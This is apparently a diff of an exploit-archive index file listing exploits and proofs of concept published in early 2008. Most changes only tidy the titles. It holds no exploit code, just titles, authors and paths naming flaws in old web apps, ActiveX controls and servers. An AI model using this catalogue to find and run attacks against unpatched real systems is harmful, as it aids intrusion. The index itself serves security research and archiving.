Injection",2008-01-08,ka0x,php,webapps,0 -4868,platforms/windows/remote/4868.html,"Move Networks Quantum Streaming Player - SEH Overwrite",2008-01-08,Elazar,windows,remote,0 +4868,platforms/windows/remote/4868.html,"Move Networks Quantum Streaming Player - Overwrite (SEH)",2008-01-08,Elazar,windows,remote,0 4869,platforms/windows/remote/4869.html,"Gateway Weblaunch - ActiveX Control Insecure Method Exploit",2008-01-08,Elazar,windows,remote,0 4870,platforms/php/webapps/4870.txt,"osData 2.08 Modules Php121 - Local File Inclusion",2008-01-09,"Cold Zero",php,webapps,0 -4871,platforms/php/webapps/4871.php,"UploadImage/UploadScript 1.0 - Remote Change Admin Password Exploit",2008-01-09,Dj7xpl,php,webapps,0 +4871,platforms/php/webapps/4871.php,"UploadImage/UploadScript 1.0 - Remote Change Admin Password",2008-01-09,Dj7xpl,php,webapps,0 4872,platforms/php/webapps/4872.txt,"PHP Webquest 2.6 - Get Database Credentials",2008-01-09,MhZ91,php,webapps,0 4873,platforms/windows/remote/4873.html,"Microsoft FoxServer - (vfp6r.dll 6.0.8862.0) ActiveX Command Execution",2008-01-09,shinnai,windows,remote,0 4874,platforms/windows/remote/4874.html,"Microsoft Rich Textbox Control 6.0 - (SP6) SaveFile() Insecure Method",2008-01-09,shinnai,windows,remote,0 4876,platforms/php/webapps/4876.txt,"Tuned Studios Templates - Local File Inclusion",2008-01-09,DSecRG,php,webapps,0 -4877,platforms/multiple/remote/4877.txt,"SAP MaxDB 7.6.03.07 - Pre-Authentication Remote Command Execution Exploit",2008-01-09,"Luigi Auriemma",multiple,remote,7210 +4877,platforms/multiple/remote/4877.txt,"SAP MaxDB 7.6.03.07 - Pre-Authentication Remote Command Execution",2008-01-09,"Luigi Auriemma",multiple,remote,7210 4878,platforms/multiple/dos/4878.pl,"McAfee E-Business Server - Remote Pre-Authentication Code Execution / Denial of Service (PoC)",2008-01-09,"Leon Juranic",multiple,dos,0 -4879,platforms/php/webapps/4879.php,"Docebo 3.5.0.3 - (lib.regset.php) Command Execution Exploit",2008-01-09,EgiX,php,webapps,0 +4879,platforms/php/webapps/4879.php,"Docebo 3.5.0.3 - (lib.regset.php) Command Execution",2008-01-09,EgiX,php,webapps,0 4880,platforms/php/webapps/4880.php,"DomPHP 0.81 - Remote Add Administrator Exploit",2008-01-10,j0j0,php,webapps,0 -4881,platforms/solaris/dos/4881.c,"SunOS 5.10 - Remote ICMP Kernel Crash Exploit",2008-01-10,kingcope,solaris,dos,0 +4881,platforms/solaris/dos/4881.c,"SunOS 5.10 - Remote ICMP Kernel Crash",2008-01-10,kingcope,solaris,dos,0 4882,platforms/php/webapps/4882.txt,"MTCMS 2.0 - SQL Injection",2008-01-10,"Virangar Security",php,webapps,0 4883,platforms/php/webapps/4883.txt,"DomPHP 0.81 - 'index.php' Remote File Inclusion",2008-01-10,Houssamix,php,webapps,0 4884,platforms/php/webapps/4884.php,"Evilsentinel 1.0.9 - (Multiple Vulnerabilities) Disable Exploit",2008-01-10,BlackHawk,php,webapps,0 @@ -4537,22 +4538,22 @@ id,file,description,date,author,platform,type,port 4891,platforms/php/webapps/4891.php,"Docebo 3.5.0.3 - (lib.regset.php/non-blind) SQL Injection",2008-01-11,rgod,php,webapps,0 4892,platforms/windows/local/4892.py,"Microsoft Visual InterDev 6.0 - (SP6) .sln File Local Buffer Overflow",2008-01-11,shinnai,windows,local,0 4893,platforms/linux/dos/4893.c,"Linux Kernel 2.6.21.1 - IPv6 Jumbo Bug Remote Denial of Service",2008-01-11,"Clemens Kurtenbach",linux,dos,0 -4894,platforms/windows/remote/4894.html,"StreamAudio ChainCast ProxyManager - ccpm_0237.dll Buffer Overflow Exploit",2008-01-11,Elazar,windows,remote,0 +4894,platforms/windows/remote/4894.html,"StreamAudio ChainCast ProxyManager - ccpm_0237.dll Buffer Overflow",2008-01-11,Elazar,windows,remote,0 4895,platforms/php/webapps/4895.txt,"ImageAlbum 2.0.0b2 - 'id' SQL Injection",2008-01-11,"Raw Security",php,webapps,0 -4896,platforms/php/webapps/4896.pl,"0DayDB 2.3 - 'delete id' Remote Authentication Bypass Exploit",2008-01-11,Pr0metheuS,php,webapps,0 -4897,platforms/php/webapps/4897.pl,"photokron 1.7 - (update script) Remote Database Disclosure Exploit",2008-01-11,Pr0metheuS,php,webapps,0 +4896,platforms/php/webapps/4896.pl,"0DayDB 2.3 - 'delete id' Remote Authentication Bypass",2008-01-11,Pr0metheuS,php,webapps,0 +4897,platforms/php/webapps/4897.pl,"photokron 1.7 - (update script) Remote Database Disclosure",2008-01-11,Pr0metheuS,php,webapps,0 4898,platforms/php/webapps/4898.txt,"Agares phpAutoVideo 2.21 - 'articlecat' SQL Injection (1)",2008-01-12,ka0x,php,webapps,0 4899,platforms/php/webapps/4899.txt,"TaskFreak! 0.6.1 - SQL Injection",2008-01-12,TheDefaced,php,webapps,0 4900,platforms/asp/webapps/4900.txt,"ASP Photo Gallery 1.0 - Multiple SQL Injections",2008-01-12,trew,asp,webapps,0 -4901,platforms/php/webapps/4901.txt,"TutorialCMS 1.02 - 'username' SQL Injection",2008-01-12,ka0x,php,webapps,0 +4901,platforms/php/webapps/4901.txt,"TutorialCMS 1.02 - ''Username'' SQL Injection",2008-01-12,ka0x,php,webapps,0 4902,platforms/php/webapps/4902.txt,"minimal Gallery 0.8 - Remote File Disclosure",2008-01-13,Houssamix,php,webapps,0 -4903,platforms/windows/remote/4903.html,"NUVICO DVR NVDV4 / PdvrAtl Module (PdvrAtl.DLL 1.0.1.25) - Buffer Overflow Exploit",2008-01-13,rgod,windows,remote,0 +4903,platforms/windows/remote/4903.html,"NUVICO DVR NVDV4 / PdvrAtl Module (PdvrAtl.DLL 1.0.1.25) - Buffer Overflow",2008-01-13,rgod,windows,remote,0 4904,platforms/php/webapps/4904.txt,"Binn SBuilder - (nid) Blind SQL Injection",2008-01-13,JosS,php,webapps,0 4905,platforms/php/webapps/4905.pl,"Agares phpAutoVideo 2.21 - 'articlecat' SQL Injection (2)",2008-01-13,Pr0metheuS,php,webapps,0 4906,platforms/windows/remote/4906.txt,"QuickTime Player 7.3.1.70 - RTSP Remote Buffer Overflow (PoC)",2008-01-14,"Luigi Auriemma",windows,remote,0 4907,platforms/php/webapps/4907.py,"X7 Chat 2.0.5 - 'day' SQL Injection",2008-01-14,nonroot,php,webapps,0 4908,platforms/php/webapps/4908.pl,"Xforum 1.4 - (topic) SQL Injection",2008-01-14,j0j0,php,webapps,0 -4909,platforms/windows/remote/4909.html,"Macrovision FlexNet DownloadManager - Insecure Methods Exploit",2008-01-14,Elazar,windows,remote,0 +4909,platforms/windows/remote/4909.html,"Macrovision FlexNet DownloadManager - Insecure Methods",2008-01-14,Elazar,windows,remote,0 4910,platforms/asp/webapps/4910.pl,"RichStrong CMS - 'showproduct.asp cat' SQL Injection",2008-01-14,JosS,asp,webapps,0 4911,platforms/windows/dos/4911.c,"Cisco VPN Client - IPSec Driver Local kernel system pool Corruption (PoC)",2008-01-15,mu-b,windows,dos,0 4912,platforms/php/webapps/4912.txt,"LulieBlog 1.0.1 - (delete id) Remote Authentication Bypass",2008-01-15,ka0x,php,webapps,0 @@ -4561,27 +4562,27 @@ id,file,description,date,author,platform,type,port 4915,platforms/php/webapps/4915.txt,"FaScript FaName 1.0 - (page.php) SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps,0 4916,platforms/php/webapps/4916.txt,"FaScript FaPersian Petition - 'show.php' SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps,0 4917,platforms/php/webapps/4917.txt,"FaScript FaPersianHack 1.0 - (show.php) SQL Injection",2008-01-15,"Khashayar Fereidani",php,webapps,0 -4918,platforms/windows/remote/4918.html,"RTS Sentry Digital Surveillance - (CamPanel.dll 2.1.0.2) Buffer Overflow Exploit",2008-01-16,rgod,windows,remote,0 +4918,platforms/windows/remote/4918.html,"RTS Sentry Digital Surveillance - (CamPanel.dll 2.1.0.2) Buffer Overflow",2008-01-16,rgod,windows,remote,0 4919,platforms/php/webapps/4919.txt,"blogcms 4.2.1b - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-01-16,DSecRG,php,webapps,0 4920,platforms/php/webapps/4920.txt,"Aria 0.99-6 - 'effect.php' Local File Inclusion",2008-01-16,DSecRG,php,webapps,0 4921,platforms/asp/webapps/4921.txt,"MailBee WebMail Pro 4.1 - (ASP.NET) Remote File Disclosure",2008-01-16,-=M.o.B=-,asp,webapps,0 4922,platforms/php/webapps/4922.txt,"alitalk 1.9.1.1 - Multiple Vulnerabilities",2008-01-16,tomplixsee,php,webapps,0 4923,platforms/windows/remote/4923.txt,"miniweb 0.8.19 - Multiple Vulnerabilities",2008-01-16,"Hamid Ebadi",windows,remote,0 4924,platforms/php/webapps/4924.php,"PixelPost 1.7 - Blind SQL Injection",2008-01-16,Silentz,php,webapps,0 -4925,platforms/php/webapps/4925.txt,"PHP-RESIDENCE 0.7.2 - (Search) SQL Injection",2008-01-16,"Khashayar Fereidani",php,webapps,0 +4925,platforms/php/webapps/4925.txt,"PHP-RESIDENCE 0.7.2 - 'Search' SQL Injection",2008-01-16,"Khashayar Fereidani",php,webapps,0 4926,platforms/php/webapps/4926.pl,"Gradman 0.1.3 - (agregar_info.php) Local File Inclusion",2008-01-16,JosS,php,webapps,0 4927,platforms/php/webapps/4927.php,"MyBulletinBoard (MyBB) 1.2.10 - Remote Code Execution",2008-01-16,Silentz,php,webapps,0 4928,platforms/php/webapps/4928.txt,"mybulletinboard (MyBB) 1.2.10 - Multiple Vulnerabilities",2008-01-16,waraxe,php,webapps,0 4929,platforms/php/webapps/4929.txt,"PHPEcho CMS 2.0 - 'id' SQL Injection",2008-01-17,Stack,php,webapps,0 4930,platforms/php/webapps/4930.txt,"Mini File Host 1.2 - (upload.php language) Local File Inclusion",2008-01-17,Scary-Boys,php,webapps,0 4931,platforms/windows/dos/4931.txt,"Crystal Reports XI Release 2 - (Enterprise Tree Control) ActiveX Buffer Overflow/Denial of Service",2008-01-17,shinnai,windows,dos,0 -4932,platforms/windows/remote/4932.html,"Digital Data Communications - (RtspVaPgCtrl) Remote Buffer Overflow Exploit",2008-01-17,rgod,windows,remote,0 +4932,platforms/windows/remote/4932.html,"Digital Data Communications - (RtspVaPgCtrl) Remote Buffer Overflow",2008-01-17,rgod,windows,remote,0 4933,platforms/php/webapps/4933.pl,"AuraCMS 1.62 - (stat.php) Remote Code Execution",2008-01-18,k1tk4t,php,webapps,0 -4934,platforms/windows/remote/4934.c,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow Exploit (dnsname)",2008-01-18,"Marcin Kozlowski",windows,remote,0 +4934,platforms/windows/remote/4934.c,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow (dnsname)",2008-01-18,"Marcin Kozlowski",windows,remote,0 4935,platforms/bsd/dos/4935.c,"OpenBSD 4.2 - rtlabel_id2name() Local Null Pointer Dereference Denial of Service",2008-01-18,Hunger,bsd,dos,0 4936,platforms/php/webapps/4936.txt,"Gradman 0.1.3 - (info.php tabla) Local File Inclusion",2008-01-18,Syndr0me,php,webapps,0 4937,platforms/php/webapps/4937.txt,"Small Axe 0.3.1 - (linkbar.php cfile) Remote File Inclusion",2008-01-18,RoMaNcYxHaCkEr,php,webapps,0 -4938,platforms/windows/local/4938.py,"Microsoft Visual Basic Enterprise Ed. 6 SP6 - '.dsr' File Handling Buffer Overflow Exploit",2008-01-18,shinnai,windows,local,0 +4938,platforms/windows/local/4938.py,"Microsoft Visual Basic Enterprise Ed. 6 SP6 - '.dsr' File Handling Buffer Overflow",2008-01-18,shinnai,windows,local,0 4939,platforms/php/webapps/4939.txt,"WordPress Plugin WP-Forum 1.7.4 - SQL Injection",2008-01-19,"websec Team",php,webapps,0 4940,platforms/php/webapps/4940.pl,"Mini File Host 1.2.1 - (upload.php language) Local File Inclusion",2008-01-20,shinmai,php,webapps,0 4941,platforms/hardware/remote/4941.txt,"Belkin Wireless G Plus MIMO Router F5D9230-4 - Authentication Bypass",2008-01-20,DarkFig,hardware,remote,0 @@ -4589,8 +4590,8 @@ id,file,description,date,author,platform,type,port 4943,platforms/php/webapps/4943.txt,"Frimousse 0.0.2 - explorerdir.php Local Directory Traversal",2008-01-20,Houssamix,php,webapps,0 4944,platforms/php/webapps/4944.txt,"360 Web Manager 3.0 - (IDFM) SQL Injection",2008-01-20,"Ded MustD!e",php,webapps,0 4945,platforms/php/webapps/4945.txt,"bloofox 0.3 - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-01-20,BugReport.IR,php,webapps,0 -4946,platforms/windows/remote/4946.html,"Toshiba Surveillance - (MeIpCamX.dll 1.0.0.4) Remote Buffer Overflow Exploit",2008-01-20,rgod,windows,remote,0 -4947,platforms/linux/remote/4947.c,"Axigen 5.0.2 - AXIMilter Remote Format String Exploit",2008-01-21,hempel,linux,remote,0 +4946,platforms/windows/remote/4946.html,"Toshiba Surveillance - (MeIpCamX.dll 1.0.0.4) Remote Buffer Overflow",2008-01-20,rgod,windows,remote,0 +4947,platforms/linux/remote/4947.c,"Axigen 5.0.2 - AXIMilter Remote Format String",2008-01-21,hempel,linux,remote,0 4948,platforms/windows/remote/4948.txt,"Microsoft Windows RSH daemon 1.8 - Remote Buffer Overflow",2008-01-21,prdelka,windows,remote,0 4949,platforms/windows/remote/4949.txt,"Citadel SMTP 7.10 - Remote Overflow",2008-01-21,prdelka,windows,remote,25 4950,platforms/php/webapps/4950.php,"Coppermine Photo Gallery 1.4.10 - 'cpg1410_xek.php' SQL Injection",2008-01-21,bazik,php,webapps,0 @@ -4605,8 +4606,8 @@ id,file,description,date,author,platform,type,port 4959,platforms/windows/remote/4959.html,"HP Virtual Rooms WebHPVCInstall Control - Buffer Overflow",2008-01-22,Elazar,windows,remote,0 4960,platforms/php/webapps/4960.txt,"Easysitenetwork Recipe - 'categoryId' SQL Injection",2008-01-22,S@BUN,php,webapps,0 4961,platforms/php/webapps/4961.php,"Coppermine Photo Gallery 1.4.14 - SQL Injection",2008-01-22,RST/GHC,php,webapps,0 -4962,platforms/php/webapps/4962.pl,"SetCMS 3.6.5 - (setcms.org) Remote Command Execution Exploit",2008-01-22,RST/GHC,php,webapps,0 -4963,platforms/php/webapps/4963.pl,"YaBB SE 1.5.5 - Remote Command Execution Exploit",2008-01-22,RST/GHC,php,webapps,0 +4962,platforms/php/webapps/4962.pl,"SetCMS 3.6.5 - (setcms.org) Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0 +4963,platforms/php/webapps/4963.pl,"YaBB SE 1.5.5 - Remote Command Execution",2008-01-22,RST/GHC,php,webapps,0 4964,platforms/php/webapps/4964.php,"PHP-Nuke < 8.0 - 'sid' SQL Injection",2008-01-22,RST/GHC,php,webapps,0 4965,platforms/php/webapps/4965.php,"PHP-Nuke 8.0 Final - 'sid' SQL Injection",2008-01-22,RST/GHC,php,webapps,0 4966,platforms/php/webapps/4966.pl,"Invision Gallery 2.0.7 - SQL Injection",2008-01-22,RST/GHC,php,webapps,0 @@ -4617,7 +4618,7 @@ id,file,description,date,author,platform,type,port 4971,platforms/asp/webapps/4971.txt,"web wiz rich text editor 4.0 - Multiple Vulnerabilities",2008-01-23,BugReport.IR,asp,webapps,0 4972,platforms/asp/webapps/4972.txt,"Web Wiz NewsPad 1.02 - (sub) Directory Traversal",2008-01-23,BugReport.IR,asp,webapps,0 4973,platforms/php/webapps/4973.txt,"Siteman 1.1.9 - (cat) Remote File Disclosure",2008-01-23,"Khashayar Fereidani",php,webapps,0 -4974,platforms/windows/remote/4974.html,"Comodo AntiVirus 2.0 - ExecuteStr() Remote Command Execution Exploit",2008-01-23,h07,windows,remote,0 +4974,platforms/windows/remote/4974.html,"Comodo AntiVirus 2.0 - ExecuteStr() Remote Command Execution",2008-01-23,h07,windows,remote,0 4975,platforms/php/webapps/4975.txt,"SLAED CMS 2.5 Lite - (newlang) Local File Inclusion",2008-01-23,The_HuliGun,php,webapps,0 4976,platforms/php/webapps/4976.txt,"Liquid-Silver CMS 0.1 - (update) Local File Inclusion",2008-01-23,Stack,php,webapps,0 4977,platforms/cgi/webapps/4977.txt,"Aconon Mail 2004 - Directory Traversal",2008-01-23,"Arno Toll",cgi,webapps,0 @@ -4640,7 +4641,7 @@ id,file,description,date,author,platform,type,port 4995,platforms/multiple/local/4995.sql,"Oracle 10g R1 - PITRIG_TRUNCATE PLSQL Injection (get users hash)",2008-01-28,sh2kerr,multiple,local,0 4996,platforms/multiple/local/4996.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (change sys Password)",2008-01-28,sh2kerr,multiple,local,0 4997,platforms/multiple/dos/4997.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg Buffer Overflow (PoC)",2008-01-28,sh2kerr,multiple,dos,0 -4998,platforms/windows/local/4998.c,"Irfanview 4.10 - '.fpx' Memory Corruption Exploit",2008-01-28,Marsu,windows,local,0 +4998,platforms/windows/local/4998.c,"Irfanview 4.10 - '.fpx' Memory Corruption",2008-01-28,Marsu,windows,local,0 4999,platforms/windows/remote/4999.htm,"MailBee Objects 5.5 - (MailBee.dll) Remote Insecure Method Exploit",2008-01-28,darkl0rd,windows,remote,0 5000,platforms/php/webapps/5000.txt,"phpMyClub 0.0.1 - (page_courante) Local File Inclusion",2008-01-28,S.W.A.T.,php,webapps,0 5001,platforms/php/webapps/5001.txt,"bubbling library 1.32 - dispatcher.php Remote File Disclosure",2008-01-28,Stack,php,webapps,0 @@ -4661,11 +4662,11 @@ id,file,description,date,author,platform,type,port 5016,platforms/php/webapps/5016.txt,"Mambo Component EstateAgent 0.1 - SQL Injection",2008-01-30,S@BUN,php,webapps,0 5017,platforms/php/webapps/5017.php,"WordPress Plugin WassUp 1.4.3 - (spy.php to_date) SQL Injection",2008-01-30,enter_the_dragon,php,webapps,0 5018,platforms/php/webapps/5018.pl,"ibProArcade 3.3.0 - SQL Injection",2008-01-30,RST/GHC,php,webapps,0 -5019,platforms/php/webapps/5019.txt,"Coppermine Photo Gallery 1.4.14 - Remote Command Execution Exploit",2008-01-30,waraxe,php,webapps,0 +5019,platforms/php/webapps/5019.txt,"Coppermine Photo Gallery 1.4.14 - Remote Command Execution",2008-01-30,waraxe,php,webapps,0 5020,platforms/php/webapps/5020.txt,"Joomla Component ChronoForms 2.3.5 - Remote File Inclusion",2008-01-30,Crackers_Child,php,webapps,0 5021,platforms/php/webapps/5021.txt,"PHP Links 1.3 - (vote.php id) SQL Injection",2008-01-30,Houssamix,php,webapps,0 5022,platforms/php/webapps/5022.txt,"PHP Links 1.3 - smarty.php Remote File Inclusion",2008-01-30,Houssamix,php,webapps,0 -5025,platforms/windows/remote/5025.html,"MySpace Uploader - (MySpaceUploader.ocx 1.0.0.4) Buffer Overflow Exploit",2008-01-31,Elazar,windows,remote,0 +5025,platforms/windows/remote/5025.html,"MySpace Uploader - (MySpaceUploader.ocx 1.0.0.4) Buffer Overflow",2008-01-31,Elazar,windows,remote,0 5026,platforms/php/webapps/5026.txt,"Mindmeld 1.2.0.10 - Multiple Remote File Inclusion",2008-01-31,"David Wharton",php,webapps,0 5027,platforms/php/webapps/5027.txt,"sflog! 0.96 - Remote File Disclosure",2008-01-31,muuratsalo,php,webapps,0 5028,platforms/windows/remote/5028.html,"Chilkat FTP ActiveX 2.0 - (ChilkatCert.dll) Insecure Method Exploit",2008-01-31,darkl0rd,windows,remote,0 @@ -4673,7 +4674,7 @@ id,file,description,date,author,platform,type,port 5030,platforms/php/webapps/5030.txt,"Mambo Component Catalogshop 1.0b1 - SQL Injection",2008-01-31,S@BUN,php,webapps,0 5031,platforms/php/webapps/5031.txt,"Mambo Component Restaurant 1.0 - SQL Injection",2008-01-31,S@BUN,php,webapps,0 5032,platforms/windows/local/5032.c,"Total Video Player 1.03 - '.m3u' File Local Buffer Overflow",2008-02-01,"fl0 fl0w",windows,local,0 -5033,platforms/php/webapps/5033.txt,"LightBlog 9.5 - cp_upload_image.php Remote File Upload",2008-02-01,Omni,php,webapps,0 +5033,platforms/php/webapps/5033.txt,"LightBlog 9.5 - cp_upload_image.php Arbitrary File Upload",2008-02-01,Omni,php,webapps,0 5034,platforms/php/webapps/5034.txt,"Joomla Component NeoReferences 1.3.1 - 'catid' SQL Injection",2008-02-01,S@BUN,php,webapps,0 5035,platforms/php/webapps/5035.txt,"WordPress Plugin dmsguestbook 1.7.0 - Multiple Vulnerabilities",2008-02-02,NBBN,php,webapps,0 5036,platforms/windows/dos/5036.pl,"Titan FTP Server 6.03 - (USER/PASS) Remote Heap Overflow (PoC)",2008-02-02,securfrog,windows,dos,0 @@ -4684,14 +4685,14 @@ id,file,description,date,author,platform,type,port 5042,platforms/php/webapps/5042.txt,"BlogPHP 2 - 'id' Cross-Site Scripting / SQL Injection",2008-02-02,"Khashayar Fereidani",php,webapps,0 5043,platforms/windows/dos/5043.html,"Yahoo! Music Jukebox 2.2 - AddImage() ActiveX Remote Buffer Overflow (PoC)",2008-02-02,h07,windows,dos,0 5044,platforms/windows/dos/5044.pl,"IpSwitch WS_FTP Server with SSH 6.1.0.0 - Remote Buffer Overflow (PoC)",2008-02-03,securfrog,windows,dos,0 -5045,platforms/windows/remote/5045.html,"Sejoong Namo ActiveSquare 6 - NamoInstaller.dll ActiveX Buffer Overflow Exploit",2008-02-03,plan-s,windows,remote,0 -5046,platforms/windows/remote/5046.php,"Yahoo! Music Jukebox 2.2 - AddImage() ActiveX Remote Buffer Overflow Exploit (1)",2008-02-03,anonymous,windows,remote,0 +5045,platforms/windows/remote/5045.html,"Sejoong Namo ActiveSquare 6 - NamoInstaller.dll ActiveX Buffer Overflow",2008-02-03,plan-s,windows,remote,0 +5046,platforms/windows/remote/5046.php,"Yahoo! Music Jukebox 2.2 - AddImage() ActiveX Remote Buffer Overflow (1)",2008-02-03,anonymous,windows,remote,0 5047,platforms/php/webapps/5047.txt,"Joomla Component mosDirectory 2.3.2 - 'catid' SQL Injection",2008-02-03,GoLd_M,php,webapps,0 -5048,platforms/windows/remote/5048.html,"Yahoo! Music Jukebox 2.2 - AddImage() ActiveX Remote Buffer Overflow Exploit (2)",2008-02-03,exceed,windows,remote,0 -5049,platforms/windows/remote/5049.html,"FaceBook PhotoUploader - (ImageUploader4.ocx 4.5.57.0) Buffer Overflow Exploit",2008-02-03,Elazar,windows,remote,0 +5048,platforms/windows/remote/5048.html,"Yahoo! Music Jukebox 2.2 - AddImage() ActiveX Remote Buffer Overflow (2)",2008-02-03,exceed,windows,remote,0 +5049,platforms/windows/remote/5049.html,"FaceBook PhotoUploader - (ImageUploader4.ocx 4.5.57.0) Buffer Overflow",2008-02-03,Elazar,windows,remote,0 5050,platforms/php/webapps/5050.pl,"A-Blog 2.0 - 'id' Cross-Site Scripting / SQL Injection",2008-02-03,"Khashayar Fereidani",php,webapps,0 -5051,platforms/windows/remote/5051.html,"Yahoo! Music JukeBox 2.2 - AddButton() ActiveX Remote Buffer Overflow Exploit",2008-02-03,Elazar,windows,remote,0 -5052,platforms/windows/remote/5052.html,"Yahoo! JukeBox MediaGrid - ActiveX mediagrid.dll AddBitmap() Buffer Overflow Exploit",2008-02-03,Elazar,windows,remote,0 +5051,platforms/windows/remote/5051.html,"Yahoo! Music JukeBox 2.2 - AddButton() ActiveX Remote Buffer Overflow",2008-02-03,Elazar,windows,remote,0 +5052,platforms/windows/remote/5052.html,"Yahoo! JukeBox MediaGrid - ActiveX mediagrid.dll AddBitmap() Buffer Overflow",2008-02-03,Elazar,windows,remote,0 5053,platforms/php/webapps/5053.txt,"WordPress Plugin st_newsletter - SQL Injection",2008-02-03,S@BUN,php,webapps,0 5054,platforms/hardware/dos/5054.c,"MicroTik RouterOS 3.2 - SNMPd snmp-set Denial of Service",2008-02-03,ShadOS,hardware,dos,0 5055,platforms/php/webapps/5055.txt,"Joomla Component Marketplace 1.1.1 - SQL Injection",2008-02-03,"SoSo H H",php,webapps,0 @@ -4708,16 +4709,16 @@ id,file,description,date,author,platform,type,port 5066,platforms/php/webapps/5066.php,"WordPress MU < 1.3.2 - active_plugins option Code Execution",2008-02-05,"Alexander Concha",php,webapps,0 5067,platforms/windows/dos/5067.pl,"dBpowerAMP Audio Player Release 2 - M3U File Buffer Overflow (PoC)",2008-02-05,securfrog,windows,dos,0 5068,platforms/php/webapps/5068.txt,"OpenSiteAdmin 0.9.1.1 - Multiple File Inclusion",2008-02-06,Trancek,php,webapps,0 -5069,platforms/windows/remote/5069.pl,"dBpowerAMP Audio Player Release 2 - M3U File Buffer Overflow Exploit",2008-02-06,securfrog,windows,remote,0 +5069,platforms/windows/remote/5069.pl,"dBpowerAMP Audio Player Release 2 - M3U File Buffer Overflow",2008-02-06,securfrog,windows,remote,0 5070,platforms/php/webapps/5070.pl,"MyBulletinBoard (MyBB) 1.2.11 - private.php SQL Injection (1)",2008-02-06,F,php,webapps,0 5071,platforms/php/webapps/5071.txt,"Astanda Directory Project 1.2 - (link_id) SQL Injection",2008-02-06,you_kn0w,php,webapps,0 5072,platforms/php/webapps/5072.txt,"Joomla Component Ynews 1.0.0 - 'id' SQL Injection",2008-02-06,Crackers_Child,php,webapps,0 5073,platforms/php/webapps/5073.txt,"Mambo Component com_downloads - SQL Injection",2008-02-06,S@BUN,php,webapps,0 -5074,platforms/php/webapps/5074.php,"Mihalism Multi Host Download - 'username' Blind SQL Injection",2008-02-06,Moubik,php,webapps,0 +5074,platforms/php/webapps/5074.php,"Mihalism Multi Host Download - ''Username'' Blind SQL Injection",2008-02-06,Moubik,php,webapps,0 5075,platforms/php/webapps/5075.txt,"osCommerce Addon Customer Testimonials 3.1 - SQL Injection",2008-02-07,"it's my",php,webapps,0 5076,platforms/php/webapps/5076.txt,"Mambo Component Sermon 0.2 - (gid) SQL Injection",2008-02-07,S@BUN,php,webapps,0 5077,platforms/windows/local/5077.cpp,"Total Video Player 1.20 - '.m3u' File Local Stack Buffer Overflow",2008-02-07,"fl0 fl0w",windows,local,0 -5078,platforms/windows/remote/5078.htm,"Backup Exec System Recovery Manager 7.0.1 - File Upload Exploit",2008-02-07,titon,windows,remote,0 +5078,platforms/windows/remote/5078.htm,"Backup Exec System Recovery Manager 7.0.1 - Arbitrary File Upload",2008-02-07,titon,windows,remote,0 5079,platforms/windows/remote/5079.c,"SapLPD 6.28 (Windows/x86) - Remote Buffer Overflow",2008-02-07,BackBone,windows,remote,515 5080,platforms/php/webapps/5080.txt,"Joomla Component com_doc - SQL Injection",2008-02-07,S@BUN,php,webapps,0 5081,platforms/php/webapps/5081.txt,"Joomla Component com_noticias 1.0 - SQL Injection",2008-02-07,xcorpitx,php,webapps,0 @@ -4739,18 +4740,18 @@ id,file,description,date,author,platform,type,port 5097,platforms/php/webapps/5097.txt,"SAPID CMF Build 87 - (last_module) Remote Code Execution",2008-02-10,GoLd_M,php,webapps,0 5098,platforms/php/webapps/5098.txt,"PacerCMS 0.6 - (last_module) Remote Code Execution",2008-02-10,GoLd_M,php,webapps,0 5099,platforms/php/webapps/5099.php,"Mix Systems CMS - (parent/id) SQL Injection",2008-02-10,halkfild,php,webapps,0 -5100,platforms/windows/remote/5100.html,"ImageStation - (SonyISUpload.cab 1.0.0.38) ActiveX Buffer Overflow Exploit",2008-02-10,Elazar,windows,remote,0 +5100,platforms/windows/remote/5100.html,"ImageStation - (SonyISUpload.cab 1.0.0.38) ActiveX Buffer Overflow",2008-02-10,Elazar,windows,remote,0 5101,platforms/php/webapps/5101.pl,"vKios 2.0.0 - (products.php cat) SQL Injection",2008-02-12,NTOS-Team,php,webapps,0 5102,platforms/windows/remote/5102.html,"FaceBook PhotoUploader 5.0.14.0 - Remote Buffer Overflow",2008-02-12,"MC Group Ltd. ",windows,remote,0 5103,platforms/php/webapps/5103.txt,"Joomla Component rapidrecipe 1.6.5 - SQL Injection",2008-02-12,S@BUN,php,webapps,0 5104,platforms/php/webapps/5104.txt,"Joomla Component pcchess 0.8 - SQL Injection",2008-02-12,S@BUN,php,webapps,0 5105,platforms/php/webapps/5105.pl,"AuraCMS 2.2 - (gallery_data.php) SQL Injection",2008-02-12,DNX,php,webapps,0 -5106,platforms/windows/remote/5106.html,"Citrix Presentation Server Client - WFICA.OCX ActiveX Heap Buffer Overflow Exploit",2008-02-12,Elazar,windows,remote,0 +5106,platforms/windows/remote/5106.html,"Citrix Presentation Server Client - WFICA.OCX ActiveX Heap Buffer Overflow",2008-02-12,Elazar,windows,remote,0 5107,platforms/windows/local/5107.c,"Microsoft Office 2003 - '.wps' Stack Overflow (MS08-011)",2008-02-13,chujwamwdupe,windows,local,0 5108,platforms/php/webapps/5108.txt,"Affiliate Market 0.1 Beta - 'Language' Local File Inclusion",2008-02-13,GoLd_M,php,webapps,0 5109,platforms/php/webapps/5109.txt,"Joomla Component xfaq 1.2 - (aid) SQL Injection",2008-02-13,S@BUN,php,webapps,0 5110,platforms/windows/dos/5110.txt,"QuickTime 7.4.1 - QTPlugin.ocx Multiple Stack Overflow Vulnerabilities",2008-02-13,"laurent gaffié ",windows,dos,0 -5111,platforms/windows/remote/5111.html,"IBM Domino Web Access Upload Module - SEH Overwrite",2008-02-13,Elazar,windows,remote,0 +5111,platforms/windows/remote/5111.html,"IBM Domino Web Access Upload Module - Overwrite (SEH)",2008-02-13,Elazar,windows,remote,0 5112,platforms/jsp/webapps/5112.txt,"jspwiki 2.4.104 / 2.5.139 - Multiple Vulnerabilities",2008-02-13,"BugSec LTD",jsp,webapps,0 5113,platforms/hardware/remote/5113.txt,"Philips VOIP841 - (Firmware 1.0.4.800) Multiple Vulnerabilities",2008-02-14,ikki,hardware,remote,0 5114,platforms/php/webapps/5114.pl,"Affiliate Market 0.1 Beta - Cross-Site Scripting / SQL 